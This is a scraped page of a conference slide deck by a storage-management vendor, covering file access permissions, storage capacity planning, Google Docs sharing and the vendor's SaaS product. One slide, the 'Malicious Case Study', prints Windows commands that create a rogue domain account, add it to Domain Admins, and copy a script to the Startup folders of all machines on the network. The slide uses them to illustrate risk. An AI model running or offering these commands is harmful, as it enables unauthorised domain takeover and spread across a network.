Back-up Solutions: Where to Cut Corners & Where Not To - Daniel Kimberlin, En...Back-up Solutions: Where to Cut Corners & Where Not To - Daniel Kimberlin, En...
Back-up Solutions: Where to Cut Corners & Where Not To - Daniel Kimberlin, En...Spiceworks
 

Mehr von Spiceworks (20)

Checking your back ups without batting an eye
Checking your back ups without batting an eyeChecking your back ups without batting an eye
Checking your back ups without batting an eye
 
SpiceWorld London 2012 presentation Eaton
SpiceWorld London 2012 presentation EatonSpiceWorld London 2012 presentation Eaton
SpiceWorld London 2012 presentation Eaton
 
Spice world london 2012 Grey Howe
Spice world london 2012 Grey HoweSpice world london 2012 Grey Howe
Spice world london 2012 Grey Howe
 
Spice world london 2012 Ben Snape
Spice world london 2012 Ben SnapeSpice world london 2012 Ben Snape
Spice world london 2012 Ben Snape
 
SpiceWorld London 2012 Presentation Matthieu Jaeger
SpiceWorld London 2012 Presentation Matthieu JaegerSpiceWorld London 2012 Presentation Matthieu Jaeger
SpiceWorld London 2012 Presentation Matthieu Jaeger
 
EatonVirtualization, Connectivity and the Cloud — Trends Driving the Future o...
EatonVirtualization, Connectivity and the Cloud — Trends Driving the Future o...EatonVirtualization, Connectivity and the Cloud — Trends Driving the Future o...
EatonVirtualization, Connectivity and the Cloud — Trends Driving the Future o...
 
Bringing Patch Management to Spiceworks
Bringing Patch Management to SpiceworksBringing Patch Management to Spiceworks
Bringing Patch Management to Spiceworks
 
Introducing....Office 365
Introducing....Office 365Introducing....Office 365
Introducing....Office 365
 
Making Sense of the Cloud
Making Sense of the CloudMaking Sense of the Cloud
Making Sense of the Cloud
 
Virtualization: A Case Study from the IT Trenches - Darren Schoen, Broward Ce...
Virtualization: A Case Study from the IT Trenches - Darren Schoen, Broward Ce...Virtualization: A Case Study from the IT Trenches - Darren Schoen, Broward Ce...
Virtualization: A Case Study from the IT Trenches - Darren Schoen, Broward Ce...
 
Making IT Easier to Manage Your Virtualized Environment - David Babbitt, Spic...
Making IT Easier to Manage Your Virtualized Environment - David Babbitt, Spic...Making IT Easier to Manage Your Virtualized Environment - David Babbitt, Spic...
Making IT Easier to Manage Your Virtualized Environment - David Babbitt, Spic...
 
Can't Do It with Spiceworks? You Can Build an Extension for That! - Scott Con...
Can't Do It with Spiceworks? You Can Build an Extension for That! - Scott Con...Can't Do It with Spiceworks? You Can Build an Extension for That! - Scott Con...
Can't Do It with Spiceworks? You Can Build an Extension for That! - Scott Con...
 
Raising the Bar on Remote Site Management - Francis Sullivan & Stephen Chudle...
Raising the Bar on Remote Site Management - Francis Sullivan & Stephen Chudle...Raising the Bar on Remote Site Management - Francis Sullivan & Stephen Chudle...
Raising the Bar on Remote Site Management - Francis Sullivan & Stephen Chudle...
 
A Whole New Way to Keep Track of Your People & IT Purchasing - Justin Perkins...
A Whole New Way to Keep Track of Your People & IT Purchasing - Justin Perkins...A Whole New Way to Keep Track of Your People & IT Purchasing - Justin Perkins...
A Whole New Way to Keep Track of Your People & IT Purchasing - Justin Perkins...
 
Going the Extra Mile in Network Monitoring & Management - Greg Kattawar, Spic...
Going the Extra Mile in Network Monitoring & Management - Greg Kattawar, Spic...Going the Extra Mile in Network Monitoring & Management - Greg Kattawar, Spic...
Going the Extra Mile in Network Monitoring & Management - Greg Kattawar, Spic...
 
Getting More Nitty-gritty Details on Your Network - Brian Gugliemetti, Spicew...
Getting More Nitty-gritty Details on Your Network - Brian Gugliemetti, Spicew...Getting More Nitty-gritty Details on Your Network - Brian Gugliemetti, Spicew...
Getting More Nitty-gritty Details on Your Network - Brian Gugliemetti, Spicew...
 
Keep IT Simple (& Get IT All Done!) with Spiceworks - Paul Luciano, Expand In...
Keep IT Simple (& Get IT All Done!) with Spiceworks - Paul Luciano, Expand In...Keep IT Simple (& Get IT All Done!) with Spiceworks - Paul Luciano, Expand In...
Keep IT Simple (& Get IT All Done!) with Spiceworks - Paul Luciano, Expand In...
 
How to Take an Enterprise Approach in a SMB World - Jeff Shuron, Sports Physi...
How to Take an Enterprise Approach in a SMB World - Jeff Shuron, Sports Physi...How to Take an Enterprise Approach in a SMB World - Jeff Shuron, Sports Physi...
How to Take an Enterprise Approach in a SMB World - Jeff Shuron, Sports Physi...
 
Using Spiceworks for Change Control - Justin Davison, R J Lee Group
Using Spiceworks for Change Control - Justin Davison, R J Lee GroupUsing Spiceworks for Change Control - Justin Davison, R J Lee Group
Using Spiceworks for Change Control - Justin Davison, R J Lee Group
 
Back-up Solutions: Where to Cut Corners & Where Not To - Daniel Kimberlin, En...
Back-up Solutions: Where to Cut Corners & Where Not To - Daniel Kimberlin, En...Back-up Solutions: Where to Cut Corners & Where Not To - Daniel Kimberlin, En...
Back-up Solutions: Where to Cut Corners & Where Not To - Daniel Kimberlin, En...
 

Winning the war against data- Strategies to beat your arch nemesis: files - Gil Zimmerman, Aprigo

  • 1. TM Microsoft BizSpark Startup of the Day! Winning the war against data Strategies to beat your arch nemesis: files. Gil Zimmermann, CEO & Co-Founder
  • 2. On-Premise & Cloud Data (read: files) Identify & Act Access and Storage Control
  • 4. Aprigo IT Benchmark • SaaS offering • Over 1,000 companies using Aprigo • Over 750TBs under management • Exposure at 95% • Cost savings potential at 71% • Installs in under 5 minutes
  • 5. Data Deluge is a Problem • Files exploding everywhere • 75-90% of all data is unstructured (files) • Valuable business asset • Touched by everyone • Vulnerable & exposed • Expensive to manage
  • 6. IT Owns the Data Problem Data Deluge Data Users Compliance & Regulation Business Data Dependence = IT Budgets IT Headcount No Mid-Market Solutions ~ ∅ IT Fires Exposure Disruptio n Waste
  • 7. Access Problem Math • ACLs allow 13 different rights to access an object • 12 practical combinations of ACE settings • Permissions can be granted or denied • 2^13*12 = 98,304 different access rights you can define • Can be applied to a user/group to form an ACE, unlimited number of ACEs can be combined into an ACL • Each file/folder can be attached to a different ACL • Millions of files, hundreds/thousands of users • Business needs to know who has access to what
  • 8. Access Best Practices • Typical Exposure (95+%) • Everyone (66%) • Domain Users (45%) • Explicit Permissions (92%) • Don't over-organize your users, use inheritance • Rogue Users • Local Admins (99%) • Outsiders are a new threat on Google Docs (98%) • Talk in business terms (exposure, audit, risk, etc)
  • 9. Access Use Cases • IT Audits • Help-Desk • Active Directory Migrations • IT GRC • Data Breaches • Data Forensics • Entitlement Reporting
  • 10. Capacity Best Practices • Start with the obvious: • Untouched in 90 days (81%) • Media files (35%) vs. documents (16%) • Large files over 100MBs (49%) • Gets harder every time, so dig deeper • Orphaned files (by owner) • Small files that multiply • Talk in business terms ($/GB, overhead, etc.)
  • 11. Capacity Use Cases • Disk Full • Data Center Consolidation • Data Migration • Storage Refresh • Backup/Replication Window Failure • Chargeback • Tiering
  • 12. Storage Planning • Understanding the data composition • Capacity • Cost (primary & secondary) • Growth rate • Ownership • Data-intensive initiatives • Reclaim costs by better utilization
  • 13. Google Docs Best Practices • Basic settings • Enable/disable sharing • Set up alerts for external sharing • Hope for the best... • Google Apps APIs
  • 14. • Dashboard plugin • Discover new shares on your network • Network Share tab • Preliminary access view • Capacity utilization • Available on any network share • Find exposure & savings w/Aprigo NINJA Spiceworks Integration
  • 16. Innocent Case Study • Bill the CFO owns the Finance share • ACMESRVFinanceSecrets contains some of the company’s most sensitive data • Bill and his group have access • ‘Domain Users’ is the default permission • All employees have access • Those with access can share...
  • 17. Malicious Case Study • BUILTINAdministrators • 2 Line script to get to DOMAINAdministrators • net user /domain /add rogueuser roguepass • net group /domain "Domain Admins" /add rogueuser • 1 more line to total network access • for /F %%i in ('net view') do copy /Y %0 "%%ic$documents and settingsall usersstart menuprogramsstartup"
  • 18. Aprigo’s Approach Data Dashboard Reports & Audits ! Alerts & Monitoring Aprigo Cloud Infrastructure Capacity Management Access Management gDocs Management Access Auditing Cost Calculator IT Benchmark Go-FIX ISV Apps Customer Integrations
  • 19. Traditional Data Management LAN IT Environment Server NAS Appliances (NetApp / EMC) Windows File ServersActive Directory Metadata Collector UI Application Servers Analytics Servers Database Servers SAN Network Shares Web Services AgentsAgents AgentsAgents AgentsAgents
  • 20. SaaS Data Management LAN IT Environment THE APRIGO SOLUTION (Single SIte) Aprigo Back-End (SAS70-II Data Center) Web Services Application Servers Analytics Servers Database Servers SAN Encrypted HTTPS Traffic NAS Appliances (NetApp / EMC) Windows File ServersActive Directory Metadata Collector NINJA / UI Network Shares
  • 34. Q & A • Functionality • Technology • Plug-in • On-Premise vs. Cloud • Suggestions/Thoughts • etc...
  • 36. Customer Segments Education Financials Health IT ConsultantsTechOil
  • 37. Commercial Landscape LowCost/Ease-of-use/Scalability Complete Solution / Functionality SaaS / Cloud Aprigo is the only SaaS solution. Running in minutes, globally. Risk & Governan ce Storage & Data Mgmt Homegrown Leaders Commodity

Hinweis der Redaktion

  1. Spiceworld Session Topic: Winning the war against data- Strategies to beat your arch nemesis: files. Ever get the feeling that data hates you? Despite the time, money and energy you put into storing and securing access to files, it’s a losing battle. Users mock your efforts to use effective permissions Files are copied, shared, moved and exposed You run out of space on expensive storage and know that you’re storing junk you don’t need In this talk, we’ll show how to save time, headaches, and money managing data access and optimizing storage on your network, the cloud, and in Spiceworks.
  2. Customer Case Study examples throughout Compelling Events throughout
  3. Aprigo enables companies to visualize their on-premise and cloud based data (read: files) in a whole new way and immediately spot and act on access breaches and storage inefficiencies
  4. http://green.cx/dark-tech/how-to-turn-a-local-admin-account-in-to-a-domain-admin-account/
  5. Traditional Data Management implementation require: Time Costly to implement Complex to set-up Result: Many mid-size organizations were priced-out / prevented from using
  6. With a hosted Data Management platform, the complexity is removed out of the environment and the value is delivered as a web service. This Reduces: Time to Value Cost of solution complexity It’s imported to note that for the use cases discussed so far, the Data Classification is done on meta-data only. The actual content of the data isn’t being scanned / transported outside the environment. - Security - when choosing any hosted solution you want to make sure that: SAS70-II Data Center (Meta) Data is encrypted in transit and at rest